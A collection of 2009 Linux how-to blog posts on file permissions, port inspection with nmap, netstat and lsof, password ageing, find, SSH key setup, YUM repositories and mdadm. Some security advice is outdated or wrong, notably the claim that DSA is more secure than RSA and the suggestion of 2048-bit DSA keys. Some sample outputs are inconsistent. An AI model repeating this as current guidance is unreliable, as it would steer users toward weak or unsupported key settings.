Tuesday, December 29, 2009

Linux File permissions: Beyond "rwx"

 

The basics:

All Linux users know about the "rwx" file permissions. These define whether the owner, users in the same group, and everyone else can read, write, or execute the file.

However, have you noticed some other things in the permission field? Sometimes an "s", sometimes a "t", or a "c", "b", "l"... What do these mean? In this article, we'll check out the meanings of all these characters.

First things first, let's make the basics clear. When we do a:

ls -l

in a directory, we get something like this:

drwxr-xr-x 2 dejavu dejavu 512 7 23 14:52 directory

-rw-r--r-- 1 dejavu dejavu 3 7 23 14:52 file

What we care about here is the first 10 characters. The first character is "d" if it is a directory, and "-" if it is a normal file. The following 9 characters can be divided into 3 groups: 2-4, 5-7, and 8-10, which mark the permissions for the owner, the group, and others, respectively.

For a file, read, write, and execute are straightforward. For a directory, read and write are easy to understand too. But... what does "x" mean for a directory? Can we really execute a directory?

What "x" mean for directories

In the Linux file system, everything is a file. A directory is just a special kind of file, and in this "directory" file there are several blocks; each block holds the information of one file or one sub-directory in it.

Thus we can understand why the r permission is needed to do an ls in a directory: in fact the ls program reads the "directory" file and re-formats it into human-readable text.

And we can understand why we need the w permission to create, delete, or rename a file/sub-directory in a directory: we actually need to write to this "directory" file, to modify the corresponding blocks.

And for x, execute, let's think of it as "search: read part of the file, and then do things accordingly".

Now if we want to enter a directory, say cd to it, we'll need to read part of the "directory" file and do things accordingly. So if we don't have the x permission on a directory, we can't cd into it.

And say we have an executable file in a directory: if we want to run that file, we first need to make sure the file exists (read the "directory" file), and then do things accordingly (which needs the execute permission on the "directory" file).

It might be confusing, and you might say: "I'll just make the r and the x appear together." Right. This is indeed the most common case. However, with the understanding above, we can do something really cool:

First, let's set up our experiment environment:

mkdir directory

cd directory

echo "hello" > file

Now if we do:

ls -l

we'll get something like:

-rw-r--r-- 1 dejavu dejavu 6 7 23 15:40 file

The permission bits might be slightly different depending on your umask settings, and the user name/group name will be different. Now do a:

cd ..

chmod 300 directory

ls -l

And you'll see:

d-wx------ 2 dejavu dejavu 512 7 23 15:40 directory

We have the executable permission, but not the read permission on this directory. Now if we try to:

cd directory

ls -l

The cd command will succeed, which is decided by the x permission we have, but the ls -l command will fail:

Opening directory: permission denied

This says we don't have the r permission, so we can't read the "directory" file and find out what is in it.

But we know there's a file named "file" in it. So we can do:

cat file

or:

cd ..

cat directory/file

and we'll get what we want: the output as:

hello

Note that if you are using your shell's "tab completion" on file and directory names, you'll find that it won't work on the name "file". This is because file/directory name completion needs to read what is in the directory, which requires the r permission on the "directory" file, and we don't have it here.

The first character

As we said above, Linux treats everything in the file system as a file. Most of the time we'll see directory files (with a d as the first character of the permission field) and normal files (with a - as the first character of the permission field).

However if you do a:

ls /dev

You'll find many other characters: c, b, and l, etc.

These are for "special" files in Linux. Both c and b marks device files, which corresponds to a device.

In the Linux world, there are two ways to read/write a file: stream (character) based and block based. Stream based means we read or write the file character by character; the typical devices here are terminals. For block based devices, we read/write the file block by block; the block size (512 bytes, 1024 bytes, ...) is determined by the device. The most typical block device is a disk.
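
You can see this for yourself by listing a couple of device files; on most systems /dev/tty1 is a character device and /dev/sda is a block device (the exact device names may differ on your machine):

ls -l /dev/tty1 /dev/sda

The first character of the line will be c for the terminal and b for the disk.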

And an l marks a symbolic link file. Think of a symbolic link as something like a "file shortcut" on Windows. We'll talk more about this in a later article.

There are also s and p, where s means a Unix socket and p means a named pipe. These are facilities Linux programs use to do IPC - Inter-Process Communication. Most of the time programs create and delete these files automatically, and you don't need to worry about them.
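
If you want to see a p entry without waiting for a program to create one, you can make a named pipe yourself (a quick sketch using a throwaway path):

mkfifo /tmp/mypipe

ls -l /tmp/mypipe

rm /tmp/mypipe

The first character of the ls output will be p.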

Setuid setgid and sticky bits:

I have already discussed these three in my previous posts.

You can refer to the links below:

http://basicslinux.blogspot.com/2009/09/sticky-bit.html
http://basicslinux.blogspot.com/2009/09/special-permissions-within-red-hat.html

Friday, December 25, 2009

MERRY CHRISTMAS to all Linux Lovers

 “Some people have told me they don't think a fat penguin really embodies the grace of Linux, which just tells me they have never seen an angry penguin charging at them in excess of 100 mph. They'd be a lot more careful about what they say if they had.”

                         -- Linus Torvalds

 


Thursday, December 24, 2009

Linux Kernel Diagram

 

[Image: Linux kernel diagram]

Reading compressed Files

 

I did not know this, but if you need to show a compressed text file on the screen, you do not actually need to uncompress it.

You can use zcat to send the file to the standard output, uncompressed, but the original file remains untouched.

The syntax of the command is:

zcat file.gz

or you can also use,

gunzip -c file.gz

What happens is that the file is uncompressed on the fly and sent to standard output (usually the screen).

If the .gz file contains more than one file, they will be shown in sequence. You can also redirect the output using >.
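
For example, to page through the uncompressed content, or to save it to a new file without touching the original (file.gz is the example name from above):

zcat file.gz | less

zcat file.gz > file.txt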

Wednesday, December 23, 2009

Trash can or Recycle bin in Linux Desktop (managed from console)

 

Linux desktops, at least GNOME and KDE, have a trash can where your deleted files go (only when deleted from a desktop utility).

Now, if you want to manage it from the console, you can. First we need to know that the trash can is just another folder in the file system, located at:

$HOME/.Trash

So you can send files to the trash just by moving them there. As an example, let's suppose you have a file in your home directory called example.txt and want to move it to the trash can.

mv $HOME/example.txt $HOME/.Trash/

Whenever you want to recover it, just move it back to its original location, or to any other you prefer, like this:

mv $HOME/.Trash/example.txt $HOME/

and you are done. If you want to purge your trash can, just enter:

rm -rf $HOME/.Trash/*

BE AWARE: This action cannot be undone, so use it with care!

You can even create a script to use instead of rm in your console; the easiest one is this:

#!/bin/sh

mv "$1" ~/.Trash/

If somebody can think of a better one, please share it with us. I hope you find this info useful.
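
As one possible improvement, here is a minimal sketch that handles several files at once and keeps spaces in names intact (it assumes the same $HOME/.Trash location used above):

#!/bin/sh

# move every argument into the trash folder, creating it if needed

mkdir -p "$HOME/.Trash"

mv -- "$@" "$HOME/.Trash/"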

How to find which service is listening on a given port?

 

It is really important to know which ports are open on your PC. This is not only useful for Linux but also for other operating systems. Linux has a lot of tools to check which ports are open; the most common is nmap, a command-line tool, but a graphical front end for it also exists if you prefer that way.

So to scan your own PC and find open ports, you can enter:

sudo nmap -T Aggressive -A -v 127.0.0.1 -p 1-65000

That will scan all ports, and you will get an output like this:

Starting Nmap 4.53 ( http://insecure.org ) at 2009-12-10 10:20 BOT

Initiating SYN Stealth Scan at 10:20

Scanning localhost (127.0.0.1) [65000 ports]

Discovered open port 113/tcp on 127.0.0.1

Discovered open port 22/tcp on 127.0.0.1

Discovered open port 80/tcp on 127.0.0.1

Discovered open port 443/tcp on 127.0.0.1

Discovered open port 902/tcp on 127.0.0.1

Discovered open port 55378/tcp on 127.0.0.1

Discovered open port 3143/tcp on 127.0.0.1

Discovered open port 8307/tcp on 127.0.0.1

Discovered open port 631/tcp on 127.0.0.1

Discovered open port 8222/tcp on 127.0.0.1

Discovered open port 8308/tcp on 127.0.0.1

Discovered open port 8009/tcp on 127.0.0.1

Discovered open port 111/tcp on 127.0.0.1

Discovered open port 8005/tcp on 127.0.0.1

Discovered open port 8123/tcp on 127.0.0.1

Discovered open port 38599/tcp on 127.0.0.1

Completed SYN Stealth Scan at 10:20, 1.47s elapsed (65000 total ports)

Initiating Service scan at 10:20

Scanning 16 services on localhost (127.0.0.1)

Completed Service scan at 10:21, 88.68s elapsed (16 services on 1 host)

Initiating OS detection (try #1) against localhost (127.0.0.1)

Initiating RPCGrind Scan against localhost (127.0.0.1) at 10:21

Completed RPCGrind Scan against localhost (127.0.0.1) at 10:21, 0.12s elapsed (3 ports)

SCRIPT ENGINE: Initiating script scanning.

SCRIPT ENGINE: rpcinfo.nse is not a file.

SCRIPT ENGINE: Aborting script scan.

Host localhost (127.0.0.1) appears to be up ... good.

Interesting ports on localhost (127.0.0.1):

Not shown: 64984 closed ports

PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH 4.7p1 Debian 9 (protocol 2.0)

80/tcp open http Apache httpd 2.2.8 ((Debian))

111/tcp open rpcbind 2 (rpc #100000)

113/tcp open ident

443/tcp open https?

631/tcp open ipp CUPS 1.2

902/tcp open ssl/vmware-auth VMware GSX Authentication Daemon 1.10 (Uses VNC, SOAP)

3143/tcp open unknown

8005/tcp open unknown

8009/tcp open ajp13?

8123/tcp open http-proxy Polipo http proxy

8222/tcp open unknown

8307/tcp open unknown

8308/tcp open http Apache Tomcat/Coyote JSP engine 1.1

38599/tcp open status 1 (rpc #100024)

55378/tcp open nlockmgr 1-4 (rpc #100021)

As you can see, it tries to guess which service is listening on each port, but it can make mistakes. If you want to be sure, you need to use some other tools; we will look at three of them now.

Netstat

With netstat the command you need to enter is:

sudo netstat --tcp --udp --listening --program

The output could be something like this:

Active Internet connections (only servers)

Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name

tcp 0 0 *:902 *:* LISTEN 3441/inetd

tcp 0 0 *:38599 *:* LISTEN 2926/rpc.statd

tcp 0 0 *:3143 *:* LISTEN 2763/perl

tcp 0 0 *:sunrpc *:* LISTEN 2919/portmap

tcp 0 0 *:auth *:* LISTEN 3441/inetd

tcp 0 0 *:55378 *:* LISTEN -

tcp 0 0 *:8307 *:* LISTEN 4096/vmware-hostd

tcp 0 0 localhost:ipp *:* LISTEN 3407/cupsd

tcp 0 0 *:https *:* LISTEN 4096/vmware-hostd

tcp 0 0 *:8123 *:* LISTEN 3455/polipo

tcp 0 0 *:8222 *:* LISTEN 4096/vmware-hostd

tcp6 0 0 localhost:8005 [::]:* LISTEN 3956/webAccess

tcp6 0 0 [::]:8009 [::]:* LISTEN 3956/webAccess

tcp6 0 0 [::]:www [::]:* LISTEN 4175/apache2

tcp6 0 0 [::]:8308 [::]:* LISTEN 3956/webAccess

tcp6 0 0 [::]:ssh [::]:* LISTEN 3281/sshd

udp 0 0 *:44807 *:* 2926/rpc.statd

udp 0 0 *:36555 *:* 3467/avahi-daemon:

udp 0 0 *:982 *:* 2926/rpc.statd

udp 0 0 *:mdns *:* 3467/avahi-daemon:

udp 0 0 *:sunrpc *:* 2919/portmap

udp 0 0 *:ipp *:* 3407/cupsd

udp6 0 0 [::]:51107 [::]:* 3467/avahi-daemon:

udp6 0 0 [::]:mdns [::]:* 3467/avahi-daemon:

Now you can see which programs are opening/listening on those ports.
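
If you only care about one port, you can filter this output with grep (a quick sketch using the example port 3143 from above):

sudo netstat --tcp --udp --listening --program | grep ':3143'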

lsof

With this command you need to enter

sudo lsof +M -i4

You will get an output like this:

COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME

apt-cache 2763 www-data 3u IPv4 6403 TCP *:3143 (LISTEN)

portmap 2919 daemon 3u IPv4 6686 UDP *:sunrpc[portmapper]

portmap 2919 daemon 4u IPv4 6687 TCP *:sunrpc[portmapper] (LISTEN)

rpc.statd 2926 statd 5u IPv4 6726 UDP *:982

rpc.statd 2926 statd 7u IPv4 6736 UDP *:44807[status]

rpc.statd 2926 statd 8u IPv4 6741 TCP *:38599[status] (LISTEN)

cupsd 3407 root 0u IPv4 20058 TCP localhost:ipp (LISTEN)

cupsd 3407 root 3u IPv4 20061 UDP *:ipp

inetd 3441 root 4u IPv4 7612 TCP *:auth (LISTEN)

inetd 3441 root 5u IPv4 7615 TCP *:902 (LISTEN)

polipo 3455 proxy 0u IPv4 7649 TCP *:8123 (LISTEN)

polipo 3455 proxy 2u IPv4 11350 UDP debian.go2linux.org:59528->vnsc-bak.sys.gtei.net:domain

polipo 3455 proxy 5u IPv4 21863 TCP localhost:8123->localhost:56811 (ESTABLISHED)

polipo 3455 proxy 8u IPv4 21405 TCP localhost:8123->localhost:50403 (ESTABLISHED)

polipo 3455 proxy 22u IPv4 21872 TCP localhost:8123->localhost:56813 (ESTABLISHED)

polipo 3455 proxy 42u IPv4 21965 TCP localhost:8123->localhost:56828 (ESTABLISHED)

avahi-dae 3467 avahi 14u IPv4 7702 UDP *:mdns

avahi-dae 3467 avahi 16u IPv4 7704 UDP *:36555

vmware-ho 4096 root 6u IPv4 9022 TCP *:https (LISTEN)

vmware-ho 4096 root 7u IPv4 9023 TCP *:8222 (LISTEN)

vmware-ho 4096 root 30u IPv4 9455 TCP *:8307 (LISTEN)

firefox-b 4431 dejavu 58u IPv4 21862 TCP localhost:56811->localhost:8123 (ESTABLISHED)

firefox-b 4431 dejavu 61u IPv4 21871 TCP localhost:56813->localhost:8123 (ESTABLISHED)

firefox-b 4431 dejavu 62u IPv4 21964 TCP localhost:56828->localhost:8123 (ESTABLISHED)

firefox-b 4431 dejavu 68u IPv4 21404 TCP localhost:50403->localhost:8123 (ESTABLISHED)

Now you can see the actual program running: as an example, on port 3143 netstat showed perl, but lsof showed apt-cache (apt-cacher), which is a Perl script.
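
If you already know which port you are interested in, lsof can also query it directly (a quick sketch using the same example port):

sudo lsof -i :3143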

fuser

fuser also helps, but it is not quite like the other tools: with fuser you can also kill the process that is listening on a given port.

sudo fuser -v 3143/tcp

The output is:

USER PID ACCESS COMMAND

3143/tcp: www-data 2763 F.... apt-cacher

If you need to kill the process, enter:

sudo fuser -vk 3143/tcp

Do not forget to read the man pages of these tools for more info about their use.

Tuesday, December 22, 2009

Force your users to change their passwords frequently

 

The users of a Linux operating system should always care about security, and if you are the admin of a Linux box with lots of users, you are responsible for its security. You may want to "force" the other users to change their passwords from time to time; to do this, use the chage command.

Apply this to a user, let's say johnny:

sudo chage --list johnny

something like this may appear.

$sudo chage --list johnny

Last password change : Dec 10, 2009

Password expires : never

Password inactive : never

Account expires : never

Minimum number of days between password change : 0

Maximum number of days between password change : 99999

Number of days of warning before password expires : 7

Now let's change the password expiry date:

sudo chage -M 30 johnny

This will make the password expire 30 days after the date of the last change.

See now the new info:

$ sudo chage --list johnny

Last password change : Dec 10, 2009

Password expires : never

Password inactive : never

Account expires : never

Minimum number of days between password change : 0

Maximum number of days between password change : 30

Number of days of warning before password expires : 7

Now when I try to login as johnny, this is what I got:

$ su - johnny

Password:

You are required to change your password immediately (password aged)

Changing password for johnny.

(current) UNIX password:

Enter new UNIX password:

Retype new UNIX password:

Password unchanged

Enter new UNIX password:

Retype new UNIX password:

I tried to use the same password again, but Linux refused to let me use it, so I was forced to pick a new password.

It is good to set the warning period to 3 or more days, so the user has time to think of a good new password; otherwise they will use the first thing they can think of, resulting in a weak password, which is worse than not changing the original one.

To set the warn days use this command.

sudo chage -W 4 johnny

Now let's check the info for user johnny:

$ sudo chage --list johnny

Last password change : Nov 11, 2009

Password expires : Dec 10, 2009

Password inactive : never

Account expires : never

Minimum number of days between password change : 0

Maximum number of days between password change : 30

Number of days of warning before password expires : 4

Now you can see that the new expiry date is Dec 10, 2009, and he will get a 4-day warning about the expiry of his password.
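
All of these settings can also be combined in a single command (a sketch; johnny is still the example user and the values are the ones used above):

sudo chage -m 0 -M 30 -W 4 johnny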

Monday, December 21, 2009

[CTRL+R] Search in your last used commands

 

This is a very useful Linux shortcut: with it you can search your command history just by starting to type a command. It works somewhat like Firefox, which, when you start typing an address, tries to guess where you are trying to go.

Here is how it works.

At the command line press [CTRL+R], and you will get something like this:

(reverse-i-search)`':

There you can start typing your command, and the shell will try to guess it based on your history.

something like this:

(reverse-i-search)`histor': history|awk '{print $2}'|awk 'BEGIN {FS="|"} {print $1}'|sort|uniq -c|sort

As you can see, I have only typed histor, and the shell has searched the history in reverse order and found the last command that started with that string.

Sunday, December 20, 2009

cpio - copy files to and from archives

 

cpio is a tool to copy files from one place to another, to create archives (like tar), or to extract files from an archive file.

The good thing is that cpio takes its input from other commands like ls, or find

So you can archive all the .mp3 files in your home directory by entering this command:

ls *.mp3 | cpio -o --format=tar -F mymp3.tar

Or if you want to include subfolders

find $HOME -name "*.mp3" | cpio -o --format=tar -F mymp3.tar

You can list the contents of a .tar file.

cpio -it -F mymp3.tar

And extract them:

cpio -i -F mymp3.tar

Run info cpio for a complete tutorial.

Saturday, December 19, 2009

List the files in a tar, tar.gz, tar.bz2 files

 

Today I needed to list some files in a .tar.gz file, and after checking the man page of the tar command, I decided to write this post for anyone who may be asking: how do you read the contents of a tar file?

Here is how.

tar -tf file.tar

This will list on the screen all the files in the archive file.tar. You may want to use less to page the output:

tar -tf file.tar | less

To list the files if the .tar file is gzipped.

tar -ztf file.tar.gz

or

tar -ztf file.tar.gz | less

To list the files if the .tar file is bzipped.

tar -jtf file.tar.bz2

or

tar -jtf file.tar.bz2 | less

You can also use grep to find a specific file in the archive.
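
For example, to look for a particular file name inside a gzipped archive (myfile is just a placeholder pattern):

tar -ztf file.tar.gz | grep myfile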

Friday, December 18, 2009

Creating zip files on Linux compatible with Windows

 

If you use a Linux operating system on your PC and want to send compressed files to friends using Windows, then you cannot use tar.gz files, so you have to use zip to compress them.

First install it.

sudo aptitude install zip

That works for both Debian and Ubuntu; for Fedora or Red Hat, install it with yum, or download the RPM and install it using the rpm command.

Then use it.

zip -r zipped_file.zip /tmp/something/

And it is done, as easy as that. Now all my colleagues will be able to read the zip file.
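
On the Linux side, the archive can be listed and extracted with unzip, if it is installed:

unzip -l zipped_file.zip

unzip zipped_file.zip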

Thursday, December 17, 2009

Ten useful uses of command ‘find’

 

These are 10 useful uses of the find command in Linux. They are not necessarily the most useful ones, just some that are useful to me. I will use $HOME as the path for every example, but you may use any other.

1. Find empty directories

find $HOME -depth -type d -empty

This will find empty directories in your home directory.

2. Find empty files

find $HOME -depth -type f -empty

This will find empty regular files in your home directory.

3. Find a file with a specific name

find $HOME -name [name_of_file]

This will find files with a given name in any child directory of your home.

4. Find a file with a specific extension

find $HOME -name "*.[given_extension]"

This finds files with the given extension anywhere under your home; an example to find jpg files is:

find $HOME -name '*.jpg'

5. Find files with specific permissions

find $HOME -perm [permission bits]

This will find files with the given permission bits in your home. As an example, we can look for .txt files whose permissions are exactly 644:

find $HOME -name '*.txt' -perm 644

6. Find files with at least some given permissions, no matter the rest

find $HOME -perm -[permission_bits]

This will find files in your home that match the given permissions but may also have some others. As an example:

find $HOME -name '*.txt' -perm -644

This will find the files with 644 but also some with 664 or 777 or anything "greater" than 644.

Output comparison

Let's see some output comparison for this to be better understood.

find $HOME -name '*.txt' -perm 644 -exec ls -l {} \;

-rw-r--r-- 1 root root 181 2007-10-09 23:27 /home/dejavu/lmsensors.txt

-rw-r--r-- 1 dejavu dejavu 2757 2007-08-29 23:52 /home/dejavu/mv.txt

-rw-r--r-- 1 dejavu dejavu 77431 2007-09-05 23:11 /home/dejavu/curl.txt

find $HOME -name '*.txt' -perm -644 -exec ls -l {} \;

-rw-r--r-- 1 root root 181 2007-10-09 23:27 /home/dejavu/lmsensors.txt

-rw-r--r-- 1 dejavu dejavu 2757 2007-08-29 23:52 /home/dejavu/mv.txt

-rw-r--r-- 1 dejavu dejavu 77431 2007-09-05 23:11 /home/dejavu/curl.txt

-rw-rw-r-- 1 dejavu dejavu 464 2007-09-06 01:23 /home/dejavu/post.txt

As you can see, in the first example we do not get the file post.txt, because its permissions are 664 and do not exactly match 644; but in the second output it is listed, as it has "greater" permissions than 644.

7. Find files of given sizes

find -size n[cwbkMG]

This will output files of a given size (measured in blocks of the given unit); as an example:

find $HOME -name '*.txt' -size 4k -exec ls -l {} \;

And the output is:

-rw-r--r-- 1 dejavu dejavu 3707 2007-07-25 15:48

/home/dejavu/drupal/public_html/sites/all/modules/akismet/README.txt

-rw-r--r-- 1 dejavu dejavu 4043 2007-01-22 15:44 /home/dejavu/Desktop/front/README.txt

-rw-r--r-- 1 dejavu dejavu 3112 2007-09-23 15:39

/home/dejavu/Desktop/borrar/upgrading-drupal/public_html/sites/all/modules/adsense/README.txt

-rw-r--r-- 1 dejavu dejavu 3707 2007-09-23 15:39

/home/dejavu/Desktop/borrar/upgrading-drupal/public_html/sites/all/modules/akismet/README.txt

-rw-r--r-- 1 dejavu dejavu 3616 2007-09-23 15:39

/home/dejavu/Desktop/borrar/centos-asterisk/how-to-install.txt

Now let's see this other:

find $HOME -name '*.txt' -size 5k -exec ls -l {} \;

And the output is:

-rw-r--r-- 1 dejavu dejavu 4496 2007-09-23 15:39

/home/dejavu/Desktop/borrar/upgrading-drupal/public_html/sites/all/modules/captcha/captcha_api.txt

Now, if you look at each file size, you will see that in the first output it is always at most 4096 bytes (4k) and above 3072 (3k), while in the second output it is between 4096 (4k) and 5120 (5k).

8. Find files with a given name and any extension

find -name '[given_name].*'

This will output the files with the given name, whatever their extension.

9. Find files modified in the latest blocks of 24 hours

find -mtime n

Where n is:

0 for the last 24 hours

1 for the last 48 hours

2 for the last 72 hours

and so on.

10. Find files that were accessed in the latest blocks of 24 hours

find -atime n

Where n is:

0 for the last 24 hours

1 for the last 48 hours

2 for the last 72 hours

and so on.

In the examples I have been using the -exec parameter; it is used to execute any action on the found files. I was listing them, but you may delete them, move them, copy them, or do anything else you want.
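
For example, a sketch that deletes the found files interactively, asking before each removal ('*.tmp' is just a placeholder pattern):

find $HOME -name '*.tmp' -type f -exec rm -i {} \;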

Wednesday, December 16, 2009

How to add a directory to the path?

 

Sometimes you may need to add a directory to the Linux PATH; the reason could be to have some scripts you have written included in the execution PATH.

This is done easily with a single command line, but that will only last until you reboot the machine or log out and log in again. If you want to make it permanent, you need to edit some config files: there is a global one, and there are also specific ones for each user; choose which according to your needs.

Add a directory to the PATH only for this session

To do this, just run this command from the shell.

export PATH=$PATH:/new/directory

Or

export PATH=/new/directory:$PATH

Add a directory to the PATH of your user only

Just add one of the above commands to the .bash_profile file if you are using bash (you will have to choose the appropriate file if you are using another shell). You may also add these two lines instead of the one above:

PATH=$PATH:/new/directory

export PATH
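
For example, you can append those lines to the file straight from the shell (a sketch; /new/directory is a placeholder):

echo 'PATH=$PATH:/new/directory' >> ~/.bash_profile

echo 'export PATH' >> ~/.bash_profile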

Add a directory to the PATH globally

To do this, you will have to edit the /etc/profile file (you will have to be root to do that) and find this line:

PATH="/bin:/usr/bin:/sbin:/usr/sbin:/usr/share/bin"

And add your directory there.

Tuesday, December 15, 2009

How to mount an ISO image in Linux ?

 

According to Wikipedia:

An ISO image is an archive file (also known as a disk image) of an optical disc in a format defined by the International Organization for Standardization (ISO). This format is supported by many software vendors. ISO image files typically have a file extension of .ISO but Mac OS X ISO images often have the extension .CDR. The name ISO is taken from the ISO 9660 file system used with CD-ROM media, but an ISO image can also contain UDF file system because UDF is backward-compatible with ISO 9660.

And if you have one of those images, you can use it under Linux in two ways.

1. Burning an ISO image

http://iso.snoekonline.com/iso.htm

2. Mount the image itself to use it from disk.

Here we will see how to do the second one.

Create the mount point

sudo mkdir /mnt/iso_image

Mount the ISO image in the mounting point

sudo mount iso_image.iso /mnt/iso_image/ -t iso9660 -o ro,loop=/dev/loop0

or

sudo mount -o loop iso_image.iso /mnt/iso_image

It is good to mount it read-only (ro), as that is the way CDs work.
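
When you are done with the image, unmount it:

sudo umount /mnt/iso_image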

Monday, December 14, 2009

How to Use SSH ?

 

Secure Shell, ssh, is the modern, reasonably secure method of remotely connecting to another computer. The previous standard, telnet, transmits passwords in clear text and is therefore easy for snoopers to see. Even if you're not concerned about your own account, there have been numerous exploits that give an attacker root (administrative) access to a computer once they have a successful user-level login; from there they "own" the computers and can use them, for example, as "sleeper cells" to run denial-of-service attacks, flooding networks with useless traffic. So use ssh whenever possible, for the well-being of the entire Internet.

New users of Linux often find the language used to describe different folders, computers etc, very confusing.

This was the case when I first read this article. Therefore I decided to make this a little simpler for the new user.

To do this we will assign the following scenario to using ssh.

Mary has a laptop she is the sole user of. Her username is mary and she has called her computer "laptop", so her address is shown as mary@laptop in the terminal (bash).

Bob has a desktop computer he has called "desktop", and his username is "bob"; therefore his address is shown as bob@desktop when he is in a terminal.

We will use this format to understand how to set up ssh. We will use Mary as the example. She wants to be able to send files to Bob's machine, back up her directories to a central backup location they both share, etc.

Steps

  1. Installing ssh: it comes installed by default on all Linux distributions and on all modern Macintosh computers. Windows users can get it by running the base install of Cygwin, or simply by downloading PuTTY.
  2. The following steps assume Unix (Linux, Mac OS X) or Cygwin syntax, however.

3) The simplest, though not the best, way is to simply use it as you would telnet; this encrypts the traffic using system defaults:

$ ssh me@remote.my

In all these examples, me is your username on the remote computer, and remote.my is the computer to which you are connecting. So for Mary, her username is 'mary' and she wants to connect to Bob's computer (the remote one), so Bob will first set her up as a user on his machine.

Mary would then type from the prompt $ ssh mary@desktop.

She will be prompted for her password once she is connected to Bob's machine. If Mary's username on the local system (the laptop) is the same as that on the remote (the desktop), she can leave off the username altogether:

$ ssh desktop

4) A better way is to use shared keys.

* First generate your key using ssh-keygen:

$ ssh-keygen -t dsa -b 2048

2048 bits is rather paranoid, but doesn't result in noticeable delays on most machines; or you can use the more common 1024. DSA is more secure than RSA.

* Then when you first connect to the remote system, you'll see a dialogue something like this:

jcomeau@ns003:~$ ssh tty.freeshell.org

The authenticity of host 'tty.freeshell.org (192.168.73.1)' can't be established.

RSA key fingerprint is 53:2b:ba:92:a7:88:ca:c1:ff:c2:1c:d1:53:11:fc:4e.

Are you sure you want to continue connecting (yes/no)? yes

Warning: Permanently added 'tty.freeshell.org,192.168.73.1' (RSA) to the list of known hosts.

jcomeau@tty.freeshell.org's password:

Last login: Mon Jan 7 19:33:21 2008 from 189.130.14.207

$

* On the remote system (Bob's desktop), Mary must make sure there is a hidden .ssh directory and an authorization key file:

$ mkdir -m700 .ssh

$ touch .ssh/authorized_keys

$ chmod 600 .ssh/authorized_keys

If the directory already exists, an error message to that effect will appear; it can safely be ignored. Now log out, usually with the key sequence Ctrl-D.

* Copy your public key to the remote machine (from laptop to desktop); these are the commands Mary will type on the laptop:

$ cat .ssh/id_dsa.pub | ssh mary@desktop "cat >> .ssh/authorized_keys"

Pay careful attention to the "punctuation"! The right angle-brackets must be double as shown, or you'll wipe out any keys you already have; and the quotes must be as shown, or you won't get the desired result.
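
On systems that ship the ssh-copy-id helper, the same result can be achieved with a single command (a sketch using Mary's key and account from above):

$ ssh-copy-id -i ~/.ssh/id_dsa.pub mary@desktop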

* Now when Mary ssh's to 'desktop', she won't be asked for a password at all! The protocol takes care of the authentication, using her public key on the remote (Bob's desktop) and the private key on the local computer (Mary's laptop).

5) Multiple users can be set up on a central machine, each able to connect securely using ssh. Combined with rsync, this creates very efficient methods of backing up and transferring files safely, quickly and securely.

Creating YUM local repository

 

Sometimes, especially when you create your own RPMs, it is extremely useful to keep them in a local YUM repository. The advantage of this is that, when you install a package, YUM automatically resolves any dependencies, not only by downloading the necessary packages from the other repositories you might have in your list, but also by using your local repo as a resource for potential dependencies.

So, when installing a package (e.g. my_package.rpm) with YUM, you are supposed to have already created RPM packages for all of my_package.rpm's dependencies and to have updated the repository's metadata, so that yum is able to resolve all the dependencies. If these dependencies do not exist in any of the repositories in your list, then, in short, you cannot install your package with yum.

So, in order to install an RPM package and all the other packages that it depends on, you only need to run:

# yum install my_package.rpm

How to create a local YUM repo

You will need a utility named createrepo. Its RPM package exists in Fedora Extras. To install it, just run as root:

# yum install createrepo

Then, put all your custom RPM packages in a directory. Assuming that this directory is /mnt/My_local_repo/, you can create all the necessary metadata for your local repository by running the following command as root or as the user that owns the directory:

# createrepo /mnt/My_local_repo/

That’s it! Your local YUM repository is ready.

Keep in mind that every time you put any new RPMs in that directory or remove any old RPMs, you will need to run the above command again, so that the repository metadata gets updated.
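
Depending on your createrepo version, the --update option can speed this up by reusing the existing metadata (a sketch):

# createrepo --update /mnt/My_local_repo/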

Add your local repo to the list

The next thing you need to do is to add your local repository to your list of repos, so that yum knows where to find it. This info is kept in the /etc/yum.repos.d/ directory. As root, create a new text file in this directory, name it fedora-local.repo (you can use any name you like, but remember to add the extension .repo), and add the following info in it:

[localrepo]

name=Fedora Core $releasever - My Local Repo

baseurl=file:///mnt/My_local_repo/

enabled=1

gpgcheck=0

#gpgkey=file:///path/to/you/RPM-GPG-KEY

As you can see, we used the protocol file:/// in the baseurl option. This assumes that the local repo exists on the local machine. If it exists on another machine of your internal network, feel free to use any other protocol to tell yum where to find your local repository. For example, you can use http://, ftp://, smb://, etc.

In the above example, the GPG key check is disabled (gpgcheck=0). If you sign your packages, you can set this to "1" and uncomment the following line (gpgkey=...). This contains the path to your public key, so that YUM can verify the package signatures.

You can have as many local YUM repositories as you like.
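
To check that yum actually sees the new repository, you can clear the caches and list the configured repos (a quick sketch):

# yum clean all

# yum repolist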

Other uses of a local repository

A local repository does not only serve as a place for your custom RPMs. You can also save bandwidth by downloading all the released Fedora updates into that repo and using it to update all the systems on your internal network. This will save bandwidth and time.

Sunday, December 13, 2009

Mdadm

Mdadm is the modern tool most Linux distributions use these days to manage software RAID arrays; in the past, raidtools was the tool used for this. This post will show the most common usages of mdadm for managing software RAID arrays; it assumes you have a good understanding of software RAID and Linux in general, and it will just explain the command-line usage of mdadm. The examples below use RAID1, but they can be adapted for any RAID level the Linux kernel driver supports.

1. Create a new RAID array

Create (mdadm --create) is used to create a new array:

mdadm --create --verbose /dev/md0 --level=1 --raid-devices=2 /dev/sda1 /dev/sdb1

or using the compact notation:

mdadm -Cv /dev/md0 -l1 -n2 /dev/sd[ab]1

2. /etc/mdadm.conf

/etc/mdadm.conf or /etc/mdadm/mdadm.conf (on debian) is the main configuration file for mdadm. After we create our RAID arrays we add them to this file using:

mdadm --detail --scan >> /etc/mdadm.conf

or on debian

mdadm --detail --scan >> /etc/mdadm/mdadm.conf

3. Remove a disk from an array

We can't remove a disk directly from the array unless it is marked as failed, so we first have to fail it (if the drive has actually failed, it is normally already in the failed state and this step is not needed):

mdadm --fail /dev/md0 /dev/sda1

and now we can remove it:

mdadm --remove /dev/md0 /dev/sda1

This can be done in a single step using:

mdadm /dev/md0 --fail /dev/sda1 --remove /dev/sda1

4. Add a disk to an existing array

We can add a new disk to an array (replacing a failed one probably):

mdadm --add /dev/md0 /dev/sdb1

5. Verifying the status of the RAID arrays

We can check the status of the arrays on the system with:

cat /proc/mdstat

or

mdadm --detail /dev/md0

The output of this command will look like:

cat /proc/mdstat

Personalities : [raid1]

md0 : active raid1 sdb1[1] sda1[0]

104320 blocks [2/2] [UU]

